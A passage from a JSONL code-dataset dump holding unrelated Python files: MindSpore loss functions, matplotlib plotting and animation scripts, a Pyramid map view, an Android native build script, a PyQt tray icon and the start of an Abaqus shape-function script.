ALL_PRINT if print_to else NO_PRINTTO\n while code_ops:\n op = code_ops.pop(0)\n if dis.opname[ord(op)] not in print_ops:\n new_codestr.append(op)\n elif dis.opname[ord(op)] in need_pop:\n new_codestr.append(POP_TOP)\n elif dis.opname[ord(op)] in need_2pop:\n new_codestr.append(POP_TOP)\n new_codestr.append(POP_TOP)\n if op == dis.HAVE_ARGUMENT:\n new_codestr.append(code_ops.pop(0))\n new_code = types.CodeType(code.co_argcount, code.co_nlocals,\n code.co_stacksize, code.co_flags, \n ''.join(new_codestr), code.co_consts,\n code.co_names, code.co_varnames,\n code.co_filename, code.co_name,\n code.co_firstlineno, code.co_lnotab,\n code.co_freevars, code.co_cellvars)\n new_fn = types.FunctionType(new_code, fn.func_globals, fn.func_name,\n fn.func_defaults, fn.func_closure)\n if hasattr(fn, '__doc__'):\n new_fn.__doc__ = getattr(fn, '__doc__', None)\n return new_fn\n","sub_path":"shutup.py","file_name":"shutup.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"466082554","text":"# Copyright 2020 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"loss\"\"\"\nimport mindspore.common.dtype as mstype\nfrom mindspore.common.tensor import Tensor\nfrom mindspore.ops import operations as P\nfrom mindspore.ops import functional as F\nfrom mindspore.nn.cell import Cell\nfrom mindspore._checkparam import Validator as validator\nfrom mindspore._checkparam import Rel\nfrom ... import context\n\n\nclass _Loss(Cell):\n \"\"\"\n Base class for other losses.\n \"\"\"\n def __init__(self, reduction='mean'):\n super(_Loss, self).__init__()\n if reduction is None:\n reduction = 'none'\n\n if reduction not in ('mean', 'sum', 'none'):\n raise ValueError(f\"reduction method for {reduction.lower()} is not supported\")\n\n self.average = True\n self.reduce = True\n if reduction == 'sum':\n self.average = False\n if reduction == 'none':\n self.reduce = False\n\n self.reduce_mean = P.ReduceMean()\n self.reduce_sum = P.ReduceSum()\n\n def get_axis(self, x):\n shape = F.shape(x)\n length = F.tuple_len(shape)\n perm = F.make_range(0, length)\n return perm\n\n def get_loss(self, x):\n if self.reduce and self.average:\n x = self.reduce_mean(x, self.get_axis(x))\n if self.reduce and not self.average:\n x = self.reduce_sum(x, self.get_axis(x))\n return x\n\n def construct(self, base, target):\n raise NotImplementedError\n\n\nclass L1Loss(_Loss):\n r\"\"\"\n L1Loss creates a criterion to measure the mean absolute error (MAE) between :math:`x` and :math:`y` by element,\n where :math:`x` is the input Tensor and :math:`y` is the target Tensor.\n\n For simplicity, let :math:`x` and :math:`y` be 1-dimensional Tensor with length :math:`N`,\n the unreduced loss (i.e. with argument reduction set to 'none') of :math:`x` and :math:`y` is given as:\n\n .. math::\n L(x, y) = \\{l_1,\\dots,l_N\\}, \\quad \\text{with } l_n = \\left| x_n - y_n \\right|\n\n When argument reduction is 'mean', the mean value of :math:`L(x, y)` will be returned.\n When argument reduction is 'sum', the sum of :math:`L(x, y)` will be returned. :math:`N` is the batch size.\n\n Args:\n reduction (str): Type of reduction to apply to loss. The optional values are \"mean\", \"sum\", \"none\".\n Default: \"mean\".\n\n Inputs:\n - **input_data** (Tensor) - Tensor of shape :math:`(x_1, x_2, ..., x_R)`.\n - **target_data** (Tensor) - Tensor of shape :math:`(y_1, y_2, ..., y_S)`.\n\n Outputs:\n Tensor, loss float tensor.\n\n Examples:\n >>> loss = nn.L1Loss()\n >>> input_data = Tensor(np.array([1, 2, 3]), mindspore.float32)\n >>> target_data = Tensor(np.array([1, 2, 2]), mindspore.float32)\n >>> loss(input_data, target_data)\n \"\"\"\n def __init__(self, reduction='mean'):\n super(L1Loss, self).__init__(reduction)\n self.abs = P.Abs()\n\n def construct(self, base, target):\n x = self.abs(base - target)\n return self.get_loss(x)\n\n\nclass MSELoss(_Loss):\n r\"\"\"\n MSELoss create a criterion to measures the mean squared error (squared L2-norm) between :math:`x` and :math:`y`\n by element, where :math:`x` is the input and :math:`y` is the target.\n\n For simplicity, let :math:`x` and :math:`y` be 1-dimensional Tensor with length :math:`N`,\n the unreduced loss (i.e. with argument reduction set to 'none') of :math:`x` and :math:`y` is given as:\n\n .. math::\n L(x, y) = \\{l_1,\\dots,l_N\\}, \\quad \\text{with} \\quad l_n = (x_n - y_n)^2.\n\n When argument reduction is 'mean', the mean value of :math:`L(x, y)` will be returned.\n When argument reduction is 'sum', the sum of :math:`L(x, y)` will be returned. :math:`N` is the batch size.\n\n Args:\n reduction (str): Type of reduction to apply to loss. The optional values are \"mean\", \"sum\", \"none\".\n Default: \"mean\".\n\n Inputs:\n - **input_data** (Tensor) - Tensor of shape :math:`(x_1, x_2, ..., x_R)`.\n - **target_data** (Tensor) - Tensor of shape :math:`(y_1, y_2, ..., y_S)`.\n\n Outputs:\n Tensor, weighted loss float tensor.\n\n Examples:\n >>> loss = nn.MSELoss()\n >>> input_data = Tensor(np.array([1, 2, 3]), mindspore.float32)\n >>> target_data = Tensor(np.array([1, 2, 2]), mindspore.float32)\n >>> loss(input_data, target_data)\n \"\"\"\n def construct(self, base, target):\n x = F.square(base - target)\n return self.get_loss(x)\n\n\nclass SmoothL1Loss(_Loss):\n r\"\"\"\n A loss class for learning region proposals.\n\n SmoothL1Loss can be regarded as modified version of L1Loss or a combination of L1Loss and L2Loss.\n L1Loss computes the element-wise absolute difference between two input Tensor while L2Loss computes the\n squared difference between two input Tensor. L2Loss often leads to faster convergence but it is less\n robust to outliers.\n\n Given two input :math:`x,\\ y` of length :math:`N`, the unreduced SmoothL1Loss can be described\n as follows:\n\n .. math::\n L_{i} =\n \\begin{cases}\n 0.5 (x_i - y_i)^2, & \\text{if } |x_i - y_i| < \\text{sigma}; \\\\\n |x_i - y_i| - 0.5, & \\text{otherwise. }\n \\end{cases}\n\n Here :math:`\\text{sigma}` controls the point where the loss function changes from quadratic to linear.\n Its default value is 1.0. :math:`N` is the batch size. This function returns an\n unreduced loss Tensor.\n\n Args:\n sigma (float): A parameter used to control the point where the function will change from\n quadratic to linear. Default: 1.0.\n\n Inputs:\n - **input_data** (Tensor) - Tensor of shape :math:`(x_1, x_2, ..., x_R)`.\n - **target_data** (Tensor) - Tensor of shape :math:`(y_1, y_2, ..., y_S)`.\n\n Outputs:\n Tensor, loss float tensor.\n\n Examples:\n >>> loss = nn.SmoothL1Loss()\n >>> input_data = Tensor(np.array([1, 2, 3]), mindspore.float32)\n >>> target_data = Tensor(np.array([1, 2, 2]), mindspore.float32)\n >>> loss(input_data, target_data)\n \"\"\"\n def __init__(self, sigma=1.0):\n super(SmoothL1Loss, self).__init__()\n self.sigma = sigma\n self.smooth_l1_loss = P.SmoothL1Loss(self.sigma)\n\n def construct(self, base, target):\n return self.smooth_l1_loss(base, target)\n\n\nclass SoftmaxCrossEntropyWithLogits(_Loss):\n r\"\"\"\n Computes softmax cross entropy between logits and labels.\n\n Measures the distribution error between the probabilities of the input (computed with softmax function) and the\n target where the classes are mutually exclusive (only one class is positive) using cross entropy loss.\n\n Typical input into this function is unnormalized scores and target of each class.\n Scores Tensor :math:`x` is of shape :math:`(N, C)` and target Tensor :math:`t` is a\n Tensor of shape :math:`(N, C)` which contains one-hot labels of length :math:`C`.\n\n For each instance :math:`N_i`, the loss is given as:\n\n .. math::\n \\ell(x_i, t_i) = - \\log\\left(\\frac{\\exp(x_{t_i})}{\\sum_j \\exp(x_j)}\\right)\n = -x_{t_i} + \\log\\left(\\sum_j \\exp(x_i)\\right),\n where :math:`x_i` is a 1D score Tensor, :math:`t_i` is a scalar.\n\n Note:\n While the target classes are mutually exclusive, i.e., only one class is positive in the target, the predicted\n probabilities need not be exclusive. All that is required is that the predicted probability distribution\n of entry is a valid one.\n\n Args:\n is_grad (bool): Specifies whether calculate grad only. Default: True.\n sparse (bool): Specifies whether labels use sparse format or not. Default: False.\n reduction (Union[str, None]): Type of reduction to apply to loss. Support 'sum' or 'mean' If None,\n do not reduction. Default: None.\n smooth_factor (float): Label smoothing factor. It is a optional input. Default: 0.\n num_classes (int): The number of classes in the task. It is a optional input Default: 2.\n\n Inputs:\n - **logits** (Tensor) - Tensor of shape (N, C).\n - **labels** (Tensor) - Tensor of shape (N, ). If `sparse` is True, The type of\n `labels` is mindspore.int32. If `sparse` is False, the type of `labels` is same as the type of `logits`.\n\n Outputs:\n Tensor, a tensor of the same shape as logits with the component-wise\n logistic losses.\n\n Examples:\n >>> loss = nn.SoftmaxCrossEntropyWithLogits(sparse=True)\n >>> logits = Tensor(np.random.randint(0, 9, [1, 10]), mindspore.float32)\n >>> labels_np = np.ones([1,]).astype(np.int32)\n >>> labels = Tensor(labels_np)\n >>> loss(logits, labels)\n \"\"\"\n def __init__(self,\n is_grad=True,\n sparse=False,\n reduction=None,\n smooth_factor=0,\n num_classes=2):\n super(SoftmaxCrossEntropyWithLogits, self).__init__(reduction)\n self.is_grad = is_grad\n self.sparse = sparse\n validator.check_integer(\"num_classes\", num_classes, 1, Rel.GT, self.cls_name)\n validator.check_number_range(\"smooth_factor\", smooth_factor, 0, 1, Rel.INC_BOTH, self.cls_name)\n self.smooth_factor = smooth_factor\n self.num_classes = num_classes\n self.softmax_cross_entropy = P.SoftmaxCrossEntropyWithLogits()\n self.one_hot = P.OneHot()\n self.on_value = Tensor(1.0 - self.smooth_factor, mstype.float32)\n self.off_value = Tensor(1.0 * self.smooth_factor / (self.num_classes - 1), mstype.float32)\n self.is_cpugpu = context.get_context('device_target') in [\"CPU\", \"GPU\"]\n\n if self.is_cpugpu:\n self.sparse_softmax_cross_entropy = P.SparseSoftmaxCrossEntropyWithLogits(is_grad=self.is_grad)\n\n def construct(self, logits, labels):\n if self.is_cpugpu and self.sparse:\n x = self.sparse_softmax_cross_entropy(logits, labels)\n return x\n\n if self.sparse:\n labels = self.one_hot(labels, F.shape(logits)[-1], self.on_value, self.off_value)\n x = self.softmax_cross_entropy(logits, labels)[0]\n return self.get_loss(x)\n\n\nclass SoftmaxCrossEntropyExpand(Cell):\n r\"\"\"\n Computes softmax cross entropy between logits and labels. Implemented by expanded formula.\n\n This is a wrapper of several functions.\n\n .. math::\n \\ell(x_i, t_i) = -log\\left(\\frac{\\exp(x_{t_i})}{\\sum_j \\exp(x_j)}\\right),\n where :math:`x_i` is a 1D score Tensor, :math:`t_i` is the target class.\n\n Note:\n When argument sparse is set to True, the format of label is the index\n range from :math:`0` to :math:`C - 1` instead of one-hot vectors.\n\n Args:\n sparse(bool): Specifies whether labels use sparse format or not. Default: False.\n\n Inputs:\n - **input_data** (Tensor) - Tensor of shape :math:`(x_1, x_2, ..., x_R)`.\n - **label** (Tensor) - Tensor of shape :math:`(y_1, y_2, ..., y_S)`.\n\n Outputs:\n Tensor, a scalar tensor including the mean loss.\n\n Examples:\n >>> loss = nn.SoftmaxCrossEntropyExpand(sparse=True)\n >>> input_data = Tensor(np.ones([64, 512]), dtype=mindspore.float32)\n >>> label = Tensor(np.ones([64]), dtype=mindspore.int32)\n >>> loss(input_data, label)\n \"\"\"\n def __init__(self, sparse=False):\n super(SoftmaxCrossEntropyExpand, self).__init__()\n self.exp = P.Exp()\n self.reduce_sum = P.ReduceSum(keep_dims=True)\n self.onehot = P.OneHot()\n self.on_value = Tensor(1.0, mstype.float32)\n self.off_value = Tensor(0.0, mstype.float32)\n self.div = P.Div()\n self.log = P.Log()\n self.sum_cross_entropy = P.ReduceSum(keep_dims=False)\n self.mul = P.Mul()\n self.mul2 = P.Mul()\n self.cast = P.Cast()\n self.reduce_mean = P.ReduceMean(keep_dims=False)\n self.sparse = sparse\n self.reduce_max = P.ReduceMax(keep_dims=True)\n self.sub = P.Sub()\n\n def construct(self, logit, label):\n logit_max = self.reduce_max(logit, -1)\n exp = self.exp(self.sub(logit, logit_max))\n exp_sum = self.reduce_sum(exp, -1)\n softmax_result = self.div(exp, exp_sum)\n if self.sparse:\n label = self.onehot(label, F.shape(logit)[1], self.on_value, self.off_value)\n\n softmax_result_log = self.log(softmax_result)\n loss = self.sum_cross_entropy((self.mul(softmax_result_log, label)), -1)\n loss = self.mul2(F.scalar_to_array(-1.0), loss)\n loss = self.reduce_mean(loss, -1)\n\n return loss\n","sub_path":"mindspore/nn/loss/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":13192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"230461691","text":"####set up####\n##load libraries\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n##read in data\ndat = pd.read_csv(\"CVOE data 8_8.csv\")\n\n#make the 95% confidence intervals\ndat['diff'] = dat['Upper'].sub(dat['Lower']) #get the length of the bars\ndat['diff2'] = dat['diff'].div(2) #length from end of bar to cap\n\n##split the data into RT and Error groups\nerror_dat = dat[ dat['TYPE'] == \"ERROR\"]\n\nerror_dat['Average'] = error_dat['Average'].multiply(100) #Disregard the warnings here\nerror_dat['diff2'] = error_dat['diff2'].multiply(100)\n\n##split into groups bases on condition\nerror_dat_ya = error_dat[ error_dat[\"Conditon\"] == \"Younger\"]\nerror_dat_healthy = error_dat[ error_dat[\"Conditon\"] == \"Healthy\"]\nerror_dat_mci = error_dat[ error_dat[\"Conditon\"] == \"MCI\"]\n\n##now get only the variables needed\nerror_dat_ya2 = error_dat_ya[ error_dat_ya[\"VAR\"].isin([\"PURE\", \"ALT_SWITCH\", \"ALT_NS\", \"RAND_SWITCH\", \"RAND_NS\"])] \nerror_dat_healthy2 = error_dat_healthy[ error_dat_healthy[\"VAR\"].isin([\"PURE\", \"ALT_SWITCH\", \"ALT_NS\", \"RAND_SWITCH\", \"RAND_NS\"])] \nerror_dat_mci2 = error_dat_mci[ error_dat_mci[\"VAR\"].isin([\"PURE\", \"ALT_SWITCH\", \"ALT_NS\", \"RAND_SWITCH\", \"RAND_NS\"])] \n\n##now get averages and conf intervals\n##averages\nya_average = error_dat_ya2[\"Average\"]\nya_average2 = ya_average.tolist() #convert to list\n\nhealthy_average = error_dat_healthy2[\"Average\"]\nhealthy_average2 = healthy_average.tolist()\n\nmci_average = error_dat_mci2[\"Average\"]\nmci_average2 = mci_average.tolist()\n\n##conf intervals\nya_conf = error_dat_ya2[\"diff2\"]\nya_conf2 = ya_conf.tolist() #convert to list\n\nhealthy_conf = error_dat_healthy2[\"diff2\"]\nhealthy_conf2 = healthy_conf.tolist()\n\nmci_conf = error_dat_mci2[\"diff2\"]\nmci_conf2 = mci_conf.tolist()\n\n##set up the plot\nerror_fig = plt.figure()\nerror_fig.set_size_inches(10,15)\n\n####First, lets plot errors for pure, nonswitch, and switch trials\nbars1 = ya_average2\nbars2 = healthy_average2\nbars3 = mci_average2\n\n##set bar width\nbarwidth = 0.20 ##ax1\nbarwidth2 = 0.25 ##ax2\n\n#set bar position\nr1 = np.arange(len(bars1))\nr2 = [x + barwidth for x in r1]\nr3 = [x + barwidth for x in r2]\n\n##make the sub plots\n##ax1 will be pure vs ns vs s\n##ax2 will be local vs global\nax1 = error_fig.add_subplot(2, 1, 1)\nax2 = error_fig.add_subplot(2, 1, 2)\n\n##make the plot\nrects1 = ax1.bar(r1, bars1, width = barwidth, yerr = ya_conf2, capsize = 3, color = 'w', edgecolor = 'k',\n label ='Younger Adults')\n\nrects2 = ax1.bar(r2, bars2, width = barwidth, yerr = healthy_conf2, capsize = 3, color = 'silver', edgecolor = 'k',\n label = 'Healthy Older')\n\nrects3 = ax1.bar(r3, bars3, width = barwidth, yerr = mci_conf2, capsize = 3, color = 'dimgray', edgecolor = 'k',\n label = 'MCI Older')\n\n##Add labels, legend, and set tick marks\nax1.set_title('Mean Error Rates: Pure, Switch, and Non-Switch Trials', fontsize = 18)\nax1.set_ylabel('Mean % Error', fontsize = 16)\nax1.set_xlabel('Trial Type', fontsize = 16)\nax1.xaxis.labelpad = 7.5\nax1.set_xticks(r2)\nax1.tick_params(axis='x', which = 'major', pad = 2.5) #controls how far labels are from axis\nax1.set_xticklabels(('Pure', 'Nonswitch Alt Run', 'Nonswitch Rand', 'Switch Alt Run', 'Switch Rand'), fontsize = 10)\nbox = ax1.get_position()\nax1.set_position([box.x0, box.y0, box.width * 0.8, box.height])\nax1.legend(bbox_to_anchor=(1.04,0.5), loc=\"center left\", borderaxespad = 0, fontsize = 14)\nax1.set_ylim([0,25])\n\n####Now make the graph for local vs global costs####\n##get only the variables that are needed\nerror_dat_ya3 = error_dat_ya[ error_dat_ya[\"VAR\"].isin([\"ALT_GLOBAL\", \"RAND_GLOBAL\", \"ALT_LOCAL\", \"RAND_LOCAL\"])] \nerror_dat_healthy3 = error_dat_healthy[ error_dat_healthy[\"VAR\"].isin([\"ALT_GLOBAL\", \"RAND_GLOBAL\", \"ALT_LOCAL\", \"RAND_LOCAL\"])] \nerror_dat_mci3 = error_dat_mci[ error_dat_mci[\"VAR\"].isin([\"ALT_GLOBAL\", \"RAND_GLOBAL\", \"ALT_LOCAL\", \"RAND_LOCAL\"])]\n\n##Now get averages and conf intervals\n##averages\nya_average3 = error_dat_ya3[\"Average\"]\nya_average4 = ya_average3.tolist() #convert to list\n\nhealthy_average3 = error_dat_healthy3[\"Average\"]\nhealthy_average4 = healthy_average3.tolist()\n\nmci_average3 = error_dat_mci3[\"Average\"]\nmci_average4 = mci_average3.tolist()\n\n##get conf intervals\nya_conf3 = error_dat_ya3[\"diff2\"]\nya_conf4 = ya_conf3.tolist() #convert to list\n\nhealthy_conf3 = error_dat_healthy3[\"diff2\"]\nhealthy_conf4 = healthy_conf3.tolist()\n\nmci_conf3 = error_dat_mci3[\"diff2\"]\nmci_conf4 = mci_conf3.tolist()\n\n##make the bars\nbars4 = ya_average4\nbars5 = healthy_average4\nbars6 = mci_average4\n\n#set bar position\nr4 = np.arange(len(bars4)) + .5\nr5 = [x + barwidth2 for x in r4]\nr6 = [x + barwidth2 for x in r5]\n\n##make the plot\nrects4 = ax2.bar(r4, bars4, width = barwidth2, yerr = ya_conf4, capsize = 3, color = 'w', edgecolor = 'k',\n label ='Younger Adults')\n\nrects5 = ax2.bar(r5, bars5, width = barwidth2, yerr = healthy_conf4, capsize = 3, color = 'silver', edgecolor = 'k',\n label = 'Healthy Older')\n\nrects6 = ax2.bar(r6, bars6, width = barwidth2, yerr = mci_conf4, capsize = 3, color = 'dimgray', edgecolor = 'k',\n label = 'MCI Older')\n\n##Add labels, legend, and set tick marks\nax2.set_title('Mean Error Rates: Local and Global Switch Costs', fontsize = 18)\nax2.set_ylabel('Mean % Error', fontsize = 16)\nax2.set_xlabel('Cost Type', fontsize = 16)\nax2.xaxis.labelpad = 7.5\nax2.set_xticks(r5)\nax2.tick_params(axis='x', which = 'major', pad = 2.5) #controls how far labels are from axis\nax2.set_xticklabels(('Global Alt Run', 'Global Rand', 'Local Alt Run', 'Local Rand'), fontsize = 10)\nbox = ax2.get_position()\nax2.set_position([box.x0, box.y0, box.width * 0.8, box.height])\nax2.legend(bbox_to_anchor = (1.04,0.5), loc=\"center left\", borderaxespad = 0, fontsize = 14)\nax2.set_ylim([-2, 15])\nplt.axhline(y = 0, color='k', linestyle='-')\n\n##save figure\nerror_fig.savefig('CVOE_mean_errors.pdf', dip = 10000)\n","sub_path":"CVOE/3 Presentations/CVOE bar charts Fixed.py","file_name":"CVOE bar charts Fixed.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642573361","text":"from cister.db.models.cister import Base\nfrom cister.db.models.cister import Fleet\nfrom cister.db.models.cister import Location\nfrom cister.db.models.cister import DBSession\nfrom datetime import datetime\nfrom cister.db.views import BaseCisterView\nfrom cister.db.helpers import createBlobDetails\n\n\nclass AstroView(BaseCisterView):\n\n def __call__(self):\n dbsession = DBSession()\n location = \"A\"\n location = \"%s%s\" % (location, self.request.matchdict.get(\"galaxy\"))\n location = \"%s:%s\" % (location, self.request.matchdict.get(\"region\"))\n location = \"%s:%s\" % (location, self.request.matchdict.get(\"system\"))\n location = \"%s:%s\" % (location, self.request.matchdict.get(\"astro\"))\n\n astro = dbsession.query(Location).filter(Location.location==location).one()\n base = astro.base\n fleets = dbsession.query(Fleet).filter(Fleet.location==location)\n fleets = fleets.order_by(\"arrival-(unix_timestamp(now())-unix_timestamp(fleet.timestamp)) > 0 ASC, arrival ASC, size DESC\")\n fleets_count = fleets.count()\n if fleets_count == 0:\n fleets = []\n\n\n blobdetails = createBlobDetails(location, fleets)\n blobdetails = blobdetails.values()\n def blobsize_compare(x, y):\n xsum = x['sum']\n ysum = y['sum']\n return int(ysum - xsum)\n blobdetails = sorted(blobdetails, cmp=blobsize_compare)\n\n returnvalue = { 'location':location,\n 'astrolocation':astro,\n 'base':base,\n 'fleets':fleets,\n 'fleets_count':fleets_count,\n 'datetime':datetime,\n 'blobdetails':blobdetails\n }\n returnvalue.update(self.request.matchdict)\n return returnvalue\n\n","sub_path":"cister/db/views/map/astro.py","file_name":"astro.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"653069687","text":"\nimport os\nimport shutil\n\ndef main():\n ANDROID_HOME = os.environ['ANDROID_HOME']\n #JAVA_HOME = os.environ['JAVA_HOME']\n NDK_ROOT = os.environ['NDK_ROOT']\n \n #archs = [ \"armeabi\", \"armeabi-v7a\", \"arm64-v8a\", \"x86\", \"x86_64\" ]\n #archs = [ \"armeabi-v7a\", \"arm64-v8a\", \"x86\", \"x86_64\" ]\n #archs = [ \"arm64-v8a\", \"x86\" ]\n archs = [ \"arm64-v8a\" ]\n #archs = [ \"x86_64\" ]\n \n base_cmake_cmd = '\"' + ANDROID_HOME + '\\\\cmake\\\\3.6.4111459\\\\bin\\\\cmake\"' + ' -G\"Android Gradle - Ninja\" .. -DANDROID_NDK=\"' + NDK_ROOT + '\" -DCMAKE_BUILD_TYPE=Release -DCMAKE_MAKE_PROGRAM=\"' + ANDROID_HOME + '\\\\cmake\\\\3.6.4111459\\\\bin\\\\ninja\" -DCMAKE_TOOLCHAIN_FILE=\"' + NDK_ROOT + '\\\\build\\\\cmake\\\\android.toolchain.cmake\" -DANDROID_NATIVE_API_LEVEL=9 -DANDROID_PLATFORM=android-24 -DANDROID_STL=c++_static -DANDROID_CPP_FEATURES=\"rtti exceptions\" -DANDROID_TOOLCHAIN=clang '\n \n base_build_cmd = '\"' + ANDROID_HOME + '\\\\cmake\\\\3.6.4111459\\\\bin\\\\ninja\" '\n \n # -DANDROID_ABI=armeabi-v7a\n \n # prepare assets\n os.system('DummyApp --prepare_assets android --norun')\n \n # build native part\n for arch in archs:\n if not os.path.exists(\"build-android-\" + arch):\n os.makedirs(\"build-android-\" + arch)\n os.chdir(\"build-android-\" + arch)\n os.system('\"' + base_cmake_cmd + '-DANDROID_ABI=' + arch + (' -DANDROID_ARM_NEON=TRUE' if arch == 'armeabi-v7a' else '') + '\"')\n os.chdir('..')\n \n os.chdir(\"build-android-\" + arch)\n ret = os.system('\"' + base_build_cmd + 'DummyApp' + '\"')\n \n if ret != 0:\n return\n \n os.chdir('..')\n \n if not os.path.exists(\"android\\\\lib\\\\\" + arch + \"\\\\\"):\n os.makedirs(\"android\\\\lib\\\\\" + arch + \"\\\\\")\n \n shutil.copy2(\"build-android-\" + arch + \"\\\\src\\\\DummyApp\\\\libDummyApp.so\", \"android\\\\lib\\\\\" + arch + \"\\\\\")\n \n # build java part\n os.system(\"android\\\\build.bat\")\n shutil.copy2(\"android\\\\bin\\\\DummyApp.apk\", \"DummyApp.apk\")\n \nmain()","sub_path":"build_android.py","file_name":"build_android.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"436398886","text":"import numpy as np\n\nfrom matplotlib import cm\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\nimport matplotlib.animation as animation\n\n\nclass animator:\n def __init__(self, X, Y, Z, sequence,\n fig=0, name=None, interval=1):\n self.fig = plt.figure(fig)\n if name != None:\n self.fig.canvas.set_window_title(name)\n \n ax = self.fig.gca(projection='3d')\n ax.plot_surface(X, Y, Z, rstride=1, cstride=1,\n cmap='viridis', edgecolor='none', alpha=0.75)\n\n self.top = np.max(Z) + np.abs(np.min(Z))\n self.bottom = np.min(Z) - np.abs(np.max(Z))\n cset = ax.contourf(X,Y,Z,zdir='z',offset=self.bottom,cmap=cm.coolwarm)\n ax.set_zlim(self.bottom, self.top)\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n if name != None:\n ax.title.set_text(name)\n \n self.origin = ax.scatter3D([],[],[],color='red',marker='*')\n self.projected = ax.scatter3D([],[],[],color='black')\n\n self.X = X\n self.Y = Y\n self.Z = Z\n self.interval = interval\n self.sequence = sequence\n\n\n def animate(self,i):\n x,y = self.sequence[i]\n self.origin._offsets3d = (self.X[x,y], self.Y[x,y], self.Z[x,y])\n self.projected._offsets3d = (self.X[x,y], self.Y[x,y], self.bottom)\n\n def render(self):\n self.ani = animation.FuncAnimation(self.fig, self.animate,\n frames=np.arange(len(self.sequence)), interval=self.interval, blit=False, repeat=False)\n plt.show()\n","sub_path":"animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"66259974","text":"import logging\n\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QSystemTrayIcon, QMenu\n\nfrom gui.mainwindow import MainWindow\nfrom storage.settings_manager import SettingsManager, Settings\n\nlog = logging.getLogger(__file__)\n\n\nclass TrayIcon(QSystemTrayIcon):\n\n def __init__(self, icon: QIcon, parent: MainWindow):\n super().__init__(icon, parent)\n\n # setup UI\n self.setVisible(SettingsManager.get(Settings.TRAY_SHOW_ALWAYS))\n\n # variables\n # retrieve vars from class to print more informative log messages\n self._reasonNames = {value: name for name, value in vars(QSystemTrayIcon).items() if str(value).isnumeric()}\n self._mainWindow = parent\n self._trayMenu = self._createTrayMenu()\n self.setContextMenu(self._trayMenu)\n\n # signal and slots\n self.activated.connect(self._onMouseClicked)\n self._mainWindow.closed.connect(self.hide)\n self._mainWindow.trayed.connect(self.show)\n # self._mainWindow.raised.connect(self._onMainWindowRaised)\n\n def _createTrayMenu(self) -> QMenu:\n \"\"\"\n Create tray icon menu\n :return: menu\n \"\"\"\n menu = QMenu(self._mainWindow)\n menu.addAction(self._mainWindow.ui.actionExit)\n return menu\n\n @pyqtSlot()\n def _onMainWindowRaised(self):\n if not SettingsManager.get(Settings.TRAY_SHOW_ALWAYS):\n self.hide()\n\n @pyqtSlot(QSystemTrayIcon.ActivationReason)\n def _onMouseClicked(self, reason: QSystemTrayIcon.ActivationReason):\n \"\"\"\n Process mouse click events\n :param reason: click reason\n :return: None\n \"\"\"\n\n if reason == QSystemTrayIcon.Trigger:\n self._mainWindow.toggleWindow()\n elif reason == QSystemTrayIcon.MiddleClick:\n self._mainWindow.exit()\n else:\n log.warning(f\"Unknown QSystemTrayIcon mouse reason: {self._reasonNames[reason]}\")\n","sub_path":"vid2audio/gui/trayicon.py","file_name":"trayicon.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"458508167","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 30 10:52:17 2017\r\n\r\n@author: ITA\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script determines the element that has the maximum value of Sigmaxx after\r\nthe printing has finished.\r\n\r\nV4: READS ALSO STRESSES AT TWO FRAMES OF THE LAST STEP (INITIAL AND FINAL)\r\n\r\nV5: FLAG TO CHOOSE IF BOTH FRAMES ARE SAVED\r\n\"\"\"\r\n#from part import *\r\n#from material import *\r\n#from section import *\r\n#from assembly import *\r\n#from step import *\r\n#from interaction import *\r\n#from load import *\r\n#from mesh import *\r\n#from optimization import *\r\n#from job import *\r\n#from sketch import *\r\n#from visualization import *\r\n#from connectorBehavior import *\r\n\r\n#import math\r\n#import numpy as np\r\nfrom odbAccess import *\r\nfrom abaqusConstants import *\r\n\r\nimport odbAccess\r\n\r\nfrom multiprocessing import Pool\r\nfrom functools import partial\r\n\r\nimport math\r\nimport numpy as np\r\n\r\nimport os, os.path\r\n\r\nclass SHAPE_FUNCTIONS:\r\n def __init__(self, DIM,NNODES):\r\n self.DIMENSION = DIM\r\n self.number_nodes = NNODES\r\n \r\n def natural_nodes(self, vecX, vecY, vecZ):\r\n self.X = vecX\r\n self.Y = vecY\r\n self.Z = vecZ\r\n \r\n def nodal_temperature(self,vec_TEMP):\r\n self.TEMP_NODAL = vec_TEMP\r\n \r\n def brick_element(self,r,s,t):\r\n oneO8 = 1.0/8.0\r\n one = 1.0\r\n \r\n N1 = oneO8 *(1-r)*(1-s)*(1-t)\r\n \r\n N2 = oneO8 *(1+r)*(1-s)*(1-t)\r\n \r\n N3 = oneO8 *(1+r)*(1+s)*(1-t)\r\n \r\n N4 = oneO8 *(1-r)*(1+s)*(1-t)\r\n \r\n N5 = oneO8 *(1-r)*(1-s)*(1+t)\r\n \r\n N6 = oneO8 